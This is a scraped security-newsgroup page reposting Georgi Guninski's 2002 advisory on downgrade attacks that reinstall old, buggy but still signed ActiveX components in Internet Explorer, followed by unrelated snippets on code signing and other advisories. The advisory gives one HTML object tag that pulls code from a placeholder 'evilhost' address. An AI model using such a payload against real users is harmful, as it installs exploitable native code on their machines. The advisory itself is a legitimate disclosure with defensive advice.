Digitally signing buggy ActiveX components

Georgi Guninski raises an interesting question:

http://www.guninski.com/signedactivex.html
Digitally signing buggy ActiveX components

Date: 14 February 2002

Disclaimer:

This is just an unverified suspicion. I don't claim this information is
true.

The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

Back in 1999 Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> made
an
excellent point at:
http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
-------------------
3- Even if Microsoft fixes the hole the hole could exist forever. Why ?
As far as I know  this is the first time a hole is "SIGNED".
MS has released an "dhtmed.cab" file as an ActiveX component signed by
Microsoft
-------------------

Here is more on this.

ActiveX in internet explorer allows downloading from the web and installing
signed components (native code) on the user computer.

As history shows a lot of ActiveX components are buggy and new version is
released. The interesting part is the buggy version is still really signed
and
available in one form or another.

A pure hypothethical scenario is to try to install the old buggy signed
version
if the user don't have it or on top of the patched one.
Basically this is done this way:
--------------------
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
--------------------
So, I wonder whether doing such mischief may lead to old exploits start
working?

Workaround/Solution:
Don't know whether this is a real threat, this is just a suspicion.
Anyway, to prevent such stuff, in internet explorer security options
disable everything that contains "active".
Or at least if you see a prompt "...This is digitally signed by X..."
think do you really trust X having in mind his security record.

Regards,
Georgi Guninski
http://www.guninski.com
0
maggie
2/15/2002 6:23:00 AM
grc.security 16608 articles. 3 followers. Follow

0 Replies
330 Views

Similar Articles

[PageSpeed] 40
Get it on Google Play
Get it on Apple App Store

Reply:

Similar Artilces:

Signing an ActiveX with a digital certificate
Hi every body I've downloaded  a  digital trial  certificate (X509 standard).How  can I sign an  Activex That i've  created with?Thanks in advance. Imad Eddine BOUIHISoftware EngineerEHTPmy Web Pages Use the signcode.exe tool that is included with the .NET SDK or the Windows Platform SDK. That program will run you through a wizard that will help you sign your Active X control.Cheers,       Kevin JonesMy Blog Hi,I've looked for for signcode.exe in both of SDK and VS install folder and i didn't found anything !  Ima...

Signing ActiveX components written in .Net
Hi I've built my first ActiveX component using this guide as a reference: http://www.codeproject.com/KB/cs/CreateActiveXDotNet.aspx I've also implemented IObjectSafety.I've signed our assembly using the SignTool.exe and our VeriSign AuthentiCode signature.But when the uses hits our website and get promted to install/activate the ActiveX control the "Information Bar" says: "This website wants to run the following add-on: 'Control name is not available' from 'Unknown publisher'. If you want to..."How do I insert my own company name...

Digital signing of code for unsigned components
Hello Guys,  This article of mine explains how to sign a code without the need to buy the digital signature for Microsoft Trusted Certificate Authorities. Please note that this would be helpful for test purposes only since it requires you to install the certificate in all client browser using the application. Eventually, a certificate from Trusted Root CA like Verisign, Thawte. Etc has to be bought for insuring that your CAB/ActiveX component is available for use to all without security issues.  It even makes code signing easier, which needs only signcode.exe utility al...

Secure By Design: How Guardian Digital Secures EnGarde Secure Linux
"EnGarde Secure Linux is not just another "repackaged" Linux distribution, but a modern open source system built from the ground up to provide secure services in the threatening world of the modern Internet."... http://www.linuxsecurity.com/content/view/125195/171/ ...."The Community edition of EnGarde Secure Linux is completely free and open source, and online security and application updates are freely available with GDSN registration."... http://www.engardelinux.org/modules/index/index.cgi -- js ...

Secure File Download and Digital Signing Problem
I just got a digitial certificate so I can sign my exe's that people download from my website.So instead of the "Publisher Can't be Verified" message in Windows XP, when they run a downloaded file, they get our company name as the publisher, and can view the cert, etc...So anyway, One of my downloads is delivered over a secure connection because they have to pay for it.I use this approach, because my webhost (3rd party ASP.NET hosting) allows me to set folder level permissions. So I basically turn of anonymous access to where my download exe is, and stream it out via the ASPNET account inste...

Buggy Buggy Buggy !
Name: Andrei Petcu Email: vampiric_daemonatyahoodotcom Product: Firefox Summary: Buggy Buggy Buggy ! Comments: HI! Firefox has just installed your latest up-date and I just wanned to warn you that it's very buggy. These are a few encountered errors : - slow loading / connecting - scripts that used to work, now don't ! - some css tags on my site become invalid ! Like the padding / margins.. - A site wth Java and / or Ajax work badly.. like a game in frames - displacement on sites. (Like IExplorer) These are just from 3-4 hours of surfing / working with new v...

Delphi component to view Digitally signed pdf documents
Does some one know of a vcl component through which I can view digitally signed pdf documents. Venkatesh (my name does not seem to appear correctly in the newsgroup) "thomas hamburger" <venks@vsnl.com> wrote in message news:87646@forums.codegear.com... > Venkatesh > (my name does not seem to appear correctly in the newsgroup) You appear to be using Thunderbird. Just update you settings. It's not that difficult. -- Kevin Powick Kevin Powick wrote: > "thomas hamburger" <venks@vsnl.com> wrote in message > news:87646@for...

Symantec Internet Security ActiveX Component Arbitrary File Execution
Secunia Advisory: SA11168 Release Date: 2004-03-19 Critical: Highly critical Impact: System access Where: From remote Software: Norton Internet Security 2004 Norton Internet Security 2004 Professional Description: NGSSoftware has discovered a vulnerability in Norton Internet Security 2004, which can be exploited by malicious people to compromise a user's system. The "LaunchURL" method in the "WrapNISUM Class" (WrapUM.dll) ActiveX component makes it possible to run arbitrary executables from remote locations. This can be exploited to execute arbitra...

Lizard Labs XSign Lite
Hi to all, I have created an ActiveX component for signing XML documents named Lizard Labs XSign Lite :) It is an ActiveX software component and has been developed for secure personal and business transactions. It enables XML digital signatures using certificates over the Internet and intranet. LLXSL is compatible with Microsoft.Net, ASP.Net and many other signature verification libraries; it doesn’t need MS XML, CAPICOM or other components and works on most Windows operation system including Windows XP and Windows Vista. Although similar products are available on the market for more then 1...

What's so secure about Secure Digital? (SD cards)
I checked out the wikipedia page on these things, but it didn't have anything to say about the reasoning for 'secure'. Is it encrypted somehow, or is it 'secure' in being highly fault tolerant, or is it longevity? Torrance I've never heard of built-in encryption on an SD card, but from the website: http://www.watermarkfactory.com/resources/terms/secure-digital-card.htm The "Secure" in Secure Digital comes from the card's origin. To create the SD card, Toshiba added encryption hardware to the already-extant MMC card, to calm music ...

Digital signing Web form data using digital certificate
Hi,I am in a project in which I have to get data from the user through webform and upload it to the server after attaching the Digital signature from the user.Can anybody help me, how to digitally sign the data entered by the user in the asp.net Web form using the user's digital certificate. Kindly please describe it. Thanks in advance.RegardsPKumar...

digital sign
Can I access digital certificates installed in my browser from java language. We want to develop a java solution that enables users to validate and sign documents, independently of browser or operating system. Any hint? Thanks. ...

Digitally Signed?
Sir: Today Mozilla has on its own started to insist that I asked to have all my out going e-mails digitally signed, which I did not. So the problem is how do I get it to stop this? -- Bill Thanks a Million! William L. Hartzell wrote: > Today Mozilla has on its own started to insist that I asked to have all > my out going e-mails digitally signed, which I did not. So the problem > is how do I get it to stop this? Did you try to install Enigmail, or something? Sir: Steve Wendt wrote: > William L. Hartzell wrote: > >> Today Mozilla has on ...

sign activeX
what are the procedures to sign my activeX control thanx...

Web resources about - Digitally signing buggy ActiveX components - grc.security

Component - Wikipedia, the free encyclopedia
Text is available under the Creative Commons Attribution-ShareAlike License ;additional terms may apply. By using this site, you agree to the ...

AirAsia disaster: Indonesia cites faulty component, crew response in crash
Pilots appear to have reset the computer system's circuit breaker, leading to a series of failures that caused them to lose control of the plane ...

It’s a new year, and time for the claimed iPhone 7 component photos to begin
Taiwanese site Apple Club has posted what it claims are leaked photos of iPhone 7 components. The photos appear to show the backlight of a new ...

Japan follows US lead in banning certain Takata components
Filed under: Government/Legal , Safety , Japan Like the US, Japan will ban certain Takata's airbag inflators from vehicles in development, and ...

Lumentum, Fabrinet: Component Makers at Start of 5-Year Boom, Says Needham
Needham & Co .’s Alex Henderson today advises fiber optics enthusiasts to look to component makers , such as Lumentum ( LITE ), in 2016, more ...

Samsung reportedly lost key iPhone 7 component business
... for Samsung , which is ironic considering the two companies are fierce rivals in the mobile business. The Korean giant produces various components ...

Crew, faulty component caused AirAsia crash
Indonesian investigators said crew action and a faulty component caused the AirAsia jet crash in the Java Sea last year, killing 162 passengers. ...

John Ridley Extends ABC Studios Deal For Three More Years; Film Component Added
John Ridley and his production arm, International Famous Players Radio Picture Corporation, have extended their first-look deal with ABC Studios ...

Passive component maker Chilisin reports 20% increase in October revenues
Chilisin Electronics, which manufactures inductors and power chokes, has announced consolidated revenues for October 2015 increased 20.3% from ...

Teflon Component Tied to Kids' Weight Gain
PFOA, a main component of Teflon, has been linked to increased body fat and faster weight gain in children.

Resources last updated: 1/18/2016 3:51:06 PM